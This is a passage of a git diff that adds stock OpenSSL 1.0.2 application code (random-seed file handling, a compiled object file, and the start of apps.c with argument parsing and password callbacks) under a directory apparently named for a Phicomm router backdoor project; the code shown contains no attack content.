+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#define NON_MAIN
+#include "apps.h"
+#undef NON_MAIN
+#include <openssl/bio.h>
+#include <openssl/rand.h>
+
+static int seeded = 0;
+static int egdsocket = 0;
+
+int app_RAND_load_file(const char *file, BIO *bio_e, int dont_warn)
+{
+    int consider_randfile = (file == NULL);
+    char buffer[200];
+
+#ifdef OPENSSL_SYS_WINDOWS
+    BIO_printf(bio_e, "Loading 'screen' into random state -");
+    BIO_flush(bio_e);
+    RAND_screen();
+    BIO_printf(bio_e, " done\n");
+#endif
+
+    if (file == NULL)
+        file = RAND_file_name(buffer, sizeof buffer);
+    else if (RAND_egd(file) > 0) {
+        /*
+         * we try if the given filename is an EGD socket. if it is, we don't
+         * write anything back to the file.
+         */
+        egdsocket = 1;
+        return 1;
+    }
+    if (file == NULL || !RAND_load_file(file, -1)) {
+        if (RAND_status() == 0) {
+            if (!dont_warn) {
+                BIO_printf(bio_e, "unable to load 'random state'\n");
+                BIO_printf(bio_e,
+                           "This means that the random number generator has not been seeded\n");
+                BIO_printf(bio_e, "with much random data.\n");
+                if (consider_randfile) { /* explanation does not apply when a
+                                          * file is explicitly named */
+                    BIO_printf(bio_e,
+                               "Consider setting the RANDFILE environment variable to point at a file that\n");
+                    BIO_printf(bio_e,
+                               "'random' data can be kept in (the file will be overwritten).\n");
+                }
+            }
+            return 0;
+        }
+    }
+    seeded = 1;
+    return 1;
+}
+
+long app_RAND_load_files(char *name)
+{
+    char *p, *n;
+    int last;
+    long tot = 0;
+    int egd;
+
+    for (;;) {
+        last = 0;
+        for (p = name; ((*p != '\0') && (*p != LIST_SEPARATOR_CHAR)); p++) ;
+        if (*p == '\0')
+            last = 1;
+        *p = '\0';
+        n = name;
+        name = p + 1;
+        if (*n == '\0')
+            break;
+
+        egd = RAND_egd(n);
+        if (egd > 0)
+            tot += egd;
+        else
+            tot += RAND_load_file(n, -1);
+        if (last)
+            break;
+    }
+    if (tot > 512)
+        app_RAND_allow_write_file();
+    return (tot);
+}
+
+int app_RAND_write_file(const char *file, BIO *bio_e)
+{
+    char buffer[200];
+
+    if (egdsocket || !seeded)
+        /*
+         * If we did not manage to read the seed file, we should not write a
+         * low-entropy seed file back -- it would suppress a crucial warning
+         * the next time we want to use it.
+         */
+        return 0;
+
+    if (file == NULL)
+        file = RAND_file_name(buffer, sizeof buffer);
+    if (file == NULL || !RAND_write_file(file)) {
+        BIO_printf(bio_e, "unable to write 'random state'\n");
+        return 0;
+    }
+    return 1;
+}
+
+void app_RAND_allow_write_file(void)
+{
+    seeded = 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.o
new file mode 100644
index 0000000000000000000000000000000000000000..eeb9c856a566c6073e56cf5b6dc204f6b61dd6a5
GIT binary patch
literal 3936
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.c
new file mode 100644
index 0000000..e6bb48f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.c
@@ -0,0 +1,3210 @@
+/* apps/apps.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#if !defined(_POSIX_C_SOURCE) && defined(OPENSSL_SYS_VMS)
+/*
+ * On VMS, you need to define this to get the declaration of fileno().  The
+ * value 2 is to make sure no function defined in POSIX-2 is left undefined.
+ */
+# define _POSIX_C_SOURCE 2
+#endif
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#if !defined(OPENSSL_SYSNAME_WIN32) && !defined(OPENSSL_SYSNAME_WINCE) && !defined(NETWARE_CLIB)
+# include <strings.h>
+#endif
+#include <sys/types.h>
+#include <ctype.h>
+#include <errno.h>
+#include <assert.h>
+#include <openssl/err.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/pem.h>
+#include <openssl/pkcs12.h>
+#include <openssl/ui.h>
+#include <openssl/safestack.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_JPAKE
+# include <openssl/jpake.h>
+#endif
+
+#define NON_MAIN
+#include "apps.h"
+#undef NON_MAIN
+
+#ifdef _WIN32
+static int WIN32_rename(const char *from, const char *to);
+# define rename(from,to) WIN32_rename((from),(to))
+#endif
+
+typedef struct {
+    const char *name;
+    unsigned long flag;
+    unsigned long mask;
+} NAME_EX_TBL;
+
+static UI_METHOD *ui_method = NULL;
+
+static int set_table_opts(unsigned long *flags, const char *arg,
+                          const NAME_EX_TBL * in_tbl);
+static int set_multi_opts(unsigned long *flags, const char *arg,
+                          const NAME_EX_TBL * in_tbl);
+
+#if !defined(OPENSSL_NO_RC4) && !defined(OPENSSL_NO_RSA)
+/* Looks like this stuff is worth moving into separate function */
+static EVP_PKEY *load_netscape_key(BIO *err, BIO *key, const char *file,
+                                   const char *key_descrip, int format);
+#endif
+
+int app_init(long mesgwin);
+#ifdef undef                    /* never finished - probably never will be
+                                 * :-) */
+int args_from_file(char *file, int *argc, char **argv[])
+{
+    FILE *fp;
+    int num, i;
+    unsigned int len;
+    static char *buf = NULL;
+    static char **arg = NULL;
+    char *p;
+
+    fp = fopen(file, "r");
+    if (fp == NULL)
+        return (0);
+
+    if (fseek(fp, 0, SEEK_END) == 0)
+        len = ftell(fp), rewind(fp);
+    else
+        len = -1;
+    if (len <= 0) {
+        fclose(fp);
+        return (0);
+    }
+
+    *argc = 0;
+    *argv = NULL;
+
+    if (buf != NULL)
+        OPENSSL_free(buf);
+    buf = (char *)OPENSSL_malloc(len + 1);
+    if (buf == NULL)
+        return (0);
+
+    len = fread(buf, 1, len, fp);
+    if (len <= 1)
+        return (0);
+    buf[len] = '\0';
+
+    i = 0;
+    for (p = buf; *p; p++)
+        if (*p == '\n')
+            i++;
+    if (arg != NULL)
+        OPENSSL_free(arg);
+    arg = (char **)OPENSSL_malloc(sizeof(char *) * (i * 2));
+
+    *argv = arg;
+    num = 0;
+    p = buf;
+    for (;;) {
+        if (!*p)
+            break;
+        if (*p == '#') {        /* comment line */
+            while (*p && (*p != '\n'))
+                p++;
+            continue;
+        }
+        /* else we have a line */
+        *(arg++) = p;
+        num++;
+        while (*p && ((*p != ' ') && (*p != '\t') && (*p != '\n')))
+            p++;
+        if (!*p)
+            break;
+        if (*p == '\n') {
+            *(p++) = '\0';
+            continue;
+        }
+        /* else it is a tab or space */
+        p++;
+        while (*p && ((*p == ' ') || (*p == '\t') || (*p == '\n')))
+            p++;
+        if (!*p)
+            break;
+        if (*p == '\n') {
+            p++;
+            continue;
+        }
+        *(arg++) = p++;
+        num++;
+        while (*p && (*p != '\n'))
+            p++;
+        if (!*p)
+            break;
+        /* else *p == '\n' */
+        *(p++) = '\0';
+    }
+    *argc = num;
+    return (1);
+}
+#endif
+
+int str2fmt(char *s)
+{
+    if (s == NULL)
+        return FORMAT_UNDEF;
+    if ((*s == 'D') || (*s == 'd'))
+        return (FORMAT_ASN1);
+    else if ((*s == 'T') || (*s == 't'))
+        return (FORMAT_TEXT);
+    else if ((*s == 'N') || (*s == 'n'))
+        return (FORMAT_NETSCAPE);
+    else if ((*s == 'S') || (*s == 's'))
+        return (FORMAT_SMIME);
+    else if ((*s == 'M') || (*s == 'm'))
+        return (FORMAT_MSBLOB);
+    else if ((*s == '1')
+             || (strcmp(s, "PKCS12") == 0) || (strcmp(s, "pkcs12") == 0)
+             || (strcmp(s, "P12") == 0) || (strcmp(s, "p12") == 0))
+        return (FORMAT_PKCS12);
+    else if ((*s == 'E') || (*s == 'e'))
+        return (FORMAT_ENGINE);
+    else if ((*s == 'H') || (*s == 'h'))
+        return FORMAT_HTTP;
+    else if ((*s == 'P') || (*s == 'p')) {
+        if (s[1] == 'V' || s[1] == 'v')
+            return FORMAT_PVK;
+        else
+            return (FORMAT_PEM);
+    } else
+        return (FORMAT_UNDEF);
+}
+
+#if defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_WIN16) || defined(OPENSSL_SYS_NETWARE)
+void program_name(char *in, char *out, int size)
+{
+    int i, n;
+    char *p = NULL;
+
+    n = strlen(in);
+    /* find the last '/', '\' or ':' */
+    for (i = n - 1; i > 0; i--) {
+        if ((in[i] == '/') || (in[i] == '\\') || (in[i] == ':')) {
+            p = &(in[i + 1]);
+            break;
+        }
+    }
+    if (p == NULL)
+        p = in;
+    n = strlen(p);
+
+# if defined(OPENSSL_SYS_NETWARE)
+    /* strip off trailing .nlm if present. */
+    if ((n > 4) && (p[n - 4] == '.') &&
+        ((p[n - 3] == 'n') || (p[n - 3] == 'N')) &&
+        ((p[n - 2] == 'l') || (p[n - 2] == 'L')) &&
+        ((p[n - 1] == 'm') || (p[n - 1] == 'M')))
+        n -= 4;
+# else
+    /* strip off trailing .exe if present. */
+    if ((n > 4) && (p[n - 4] == '.') &&
+        ((p[n - 3] == 'e') || (p[n - 3] == 'E')) &&
+        ((p[n - 2] == 'x') || (p[n - 2] == 'X')) &&
+        ((p[n - 1] == 'e') || (p[n - 1] == 'E')))
+        n -= 4;
+# endif
+
+    if (n > size - 1)
+        n = size - 1;
+
+    for (i = 0; i < n; i++) {
+        if ((p[i] >= 'A') && (p[i] <= 'Z'))
+            out[i] = p[i] - 'A' + 'a';
+        else
+            out[i] = p[i];
+    }
+    out[n] = '\0';
+}
+#else
+# ifdef OPENSSL_SYS_VMS
+void program_name(char *in, char *out, int size)
+{
+    char *p = in, *q;
+    char *chars = ":]>";
+
+    while (*chars != '\0') {
+        q = strrchr(p, *chars);
+        if (q > p)
+            p = q + 1;
+        chars++;
+    }
+
+    q = strrchr(p, '.');
+    if (q == NULL)
+        q = p + strlen(p);
+    strncpy(out, p, size - 1);
+    if (q - p >= size) {
+        out[size - 1] = '\0';
+    } else {
+        out[q - p] = '\0';
+    }
+}
+# else
+void program_name(char *in, char *out, int size)
+{
+    char *p;
+
+    p = strrchr(in, '/');
+    if (p != NULL)
+        p++;
+    else
+        p = in;
+    BUF_strlcpy(out, p, size);
+}
+# endif
+#endif
+
+int chopup_args(ARGS *arg, char *buf, int *argc, char **argv[])
+{
+    int num, i;
+    char *p;
+
+    *argc = 0;
+    *argv = NULL;
+
+    i = 0;
+    if (arg->count == 0) {
+        arg->count = 20;
+        arg->data = (char **)OPENSSL_malloc(sizeof(char *) * arg->count);
+        if (arg->data == NULL)
+            return 0;
+    }
+    for (i = 0; i < arg->count; i++)
+        arg->data[i] = NULL;
+
+    num = 0;
+    p = buf;
+    for (;;) {
+        /* first scan over white space */
+        if (!*p)
+            break;
+        while (*p && ((*p == ' ') || (*p == '\t') || (*p == '\n')))
+            p++;
+        if (!*p)
+            break;
+
+        /* The start of something good :-) */
+        if (num >= arg->count) {
+            char **tmp_p;
+            int tlen = arg->count + 20;
+            tmp_p = (char **)OPENSSL_realloc(arg->data,
+                                             sizeof(char *) * tlen);
+            if (tmp_p == NULL)
+                return 0;
+            arg->data = tmp_p;
+            arg->count = tlen;
+            /* initialize newly allocated data */
+            for (i = num; i < arg->count; i++)
+                arg->data[i] = NULL;
+        }
+        arg->data[num++] = p;
+
+        /* now look for the end of this */
+        if ((*p == '\'') || (*p == '\"')) { /* scan for closing quote */
+            i = *(p++);
+            arg->data[num - 1]++; /* jump over quote */
+            while (*p && (*p != i))
+                p++;
+            *p = '\0';
+        } else {
+            while (*p && ((*p != ' ') && (*p != '\t') && (*p != '\n')))
+                p++;
+
+            if (*p == '\0')
+                p--;
+            else
+                *p = '\0';
+        }
+        p++;
+    }
+    *argc = num;
+    *argv = arg->data;
+    return (1);
+}
+
+#ifndef APP_INIT
+int app_init(long mesgwin)
+{
+    return (1);
+}
+#endif
+
+int dump_cert_text(BIO *out, X509 *x)
+{
+    char *p;
+
+    p = X509_NAME_oneline(X509_get_subject_name(x), NULL, 0);
+    BIO_puts(out, "subject=");
+    BIO_puts(out, p);
+    OPENSSL_free(p);
+
+    p = X509_NAME_oneline(X509_get_issuer_name(x), NULL, 0);
+    BIO_puts(out, "\nissuer=");
+    BIO_puts(out, p);
+    BIO_puts(out, "\n");
+    OPENSSL_free(p);
+
+    return 0;
+}
+
+static int ui_open(UI *ui)
+{
+    return UI_method_get_opener(UI_OpenSSL())(ui);
+}
+
+static int ui_read(UI *ui, UI_STRING *uis)
+{
+    if (UI_get_input_flags(uis) & UI_INPUT_FLAG_DEFAULT_PWD
+        && UI_get0_user_data(ui)) {
+        switch (UI_get_string_type(uis)) {
+        case UIT_PROMPT:
+        case UIT_VERIFY:
+            {
+                const char *password =
+                    ((PW_CB_DATA *)UI_get0_user_data(ui))->password;
+                if (password && password[0] != '\0') {
+                    UI_set_result(ui, uis, password);
+                    return 1;
+                }
+            }
+        default:
+            break;
+        }
+    }
+    return UI_method_get_reader(UI_OpenSSL())(ui, uis);
+}
+
+static int ui_write(UI *ui, UI_STRING *uis)
+{
+    if (UI_get_input_flags(uis) & UI_INPUT_FLAG_DEFAULT_PWD
+        && UI_get0_user_data(ui)) {
+        switch (UI_get_string_type(uis)) {
+        case UIT_PROMPT:
+        case UIT_VERIFY:
+            {
+                const char *password =
+                    ((PW_CB_DATA *)UI_get0_user_data(ui))->password;
+                if (password && password[0] != '\0')
+                    return 1;
+            }
+        default:
+            break;
+        }
+    }
+    return UI_method_get_writer(UI_OpenSSL())(ui, uis);
+}
+
+static int ui_close(UI *ui)
+{
+    return UI_method_get_closer(UI_OpenSSL())(ui);
+}
+
+int setup_ui_method(void)
+{
+    ui_method = UI_create_method("OpenSSL application user interface");
+    UI_method_set_opener(ui_method, ui_open);
+    UI_method_set_reader(ui_method, ui_read);
+    UI_method_set_writer(ui_method, ui_write);
+    UI_method_set_closer(ui_method, ui_close);
+    return 0;
+}
+
+void destroy_ui_method(void)
+{
+    if (ui_method) {
+        UI_destroy_method(ui_method);
+        ui_method = NULL;
+    }
+}
+
+int password_callback(char *buf, int bufsiz, int verify, PW_CB_DATA *cb_tmp)
+{
+    UI *ui = NULL;
+    int res = 0;
+    const char *prompt_info = NULL;
+    const char *password = NULL;
+    PW_CB_DATA *cb_data = (PW_CB_DATA *)cb_tmp;
+
+    if (cb_data) {
+        if (cb_data->password)
+            password = cb_data->password;
+        if (cb_data->prompt_info)
+            prompt_info = cb_data->prompt_info;
+    }
+
+    if (password) {
+        res = strlen(password);
+        if (res > bufsiz)
+            res = bufsiz;
+        memcpy(buf, password, res);
+        return res;
+    }
+
+    ui = UI_new_method(ui_method);
+    if (ui) {
+        int ok = 0;
+        char *buff = NULL;
+        int ui_flags = 0;
+        char *prompt = NULL;
+
+        prompt = UI_construct_prompt(ui, "pass phrase", prompt_info);
+
+        ui_flags |= UI_INPUT_FLAG_DEFAULT_PWD;
+        UI_ctrl(ui, UI_CTRL_PRINT_ERRORS, 1, 0, 0);
+
+        if (ok >= 0)
+            ok = UI_add_input_string(ui, prompt, ui_flags, buf,
+                                     PW_MIN_LENGTH, bufsiz - 1);
+        if (ok >= 0 && verify) {
+            buff = (char *)OPENSSL_malloc(bufsiz);
+            ok = UI_add_verify_string(ui, prompt, ui_flags, buff,
+                                      PW_MIN_LENGTH, bufsiz - 1, buf);
+        }
+        if (ok >= 0)
+            do {
+                ok = UI_process(ui);
+            }
+            while (ok < 0 && UI_ctrl(ui, UI_CTRL_IS_REDOABLE, 0, 0, 0));
+
+        if (buff) {
+            OPENSSL_cleanse(buff, (unsigned int)bufsiz);
+            OPENSSL_free(buff);
+        }
+
+        if (ok >= 0)
+            res = strlen(buf);
+        if (ok == -1) {
+            BIO_printf(bio_err, "User interface error\n");
+            ERR_print_errors(bio_err);
+            OPENSSL_cleanse(buf, (unsigned int)bufsiz);
+            res = 0;
+        }
+        if (ok == -2) {
+            BIO_printf(bio_err, "aborted!\n");
+            OPENSSL_cleanse(buf, (unsigned int)bufsiz);
+            res = 0;
+        }
+        UI_free(ui);
+        OPENSSL_free(prompt);
+    }
+    return res;
+}
+
+static char *app_get_pass(BIO *err, char *arg, int keepbio);
+
+int app_passwd(BIO *err, char *arg1, char *arg2, char **pass1, char **pass2)
+{
+    int same;
+    if (!arg2 || !arg1 || strcmp(arg1, arg2))
+        same = 0;
+    else
+        same = 1;
+    if (arg1) {
+        *pass1 = app_get_pass(err, arg1, same);
+        if (!*pass1)
+            return 0;
+    } else if (pass1)
+        *pass1 = NULL;
+    if (arg2) {
+        *pass2 = app_get_pass(err, arg2, same ? 2 : 0);
+        if (!*pass2)
+            return 0;
+    } else if (pass2)
+        *pass2 = NULL;
+    return 1;
+}
+
+static char *app_get_pass(BIO *err, char *arg, int keepbio)
+{
+    char *tmp, tpass[APP_PASS_LEN];
+    static BIO *pwdbio = NULL;
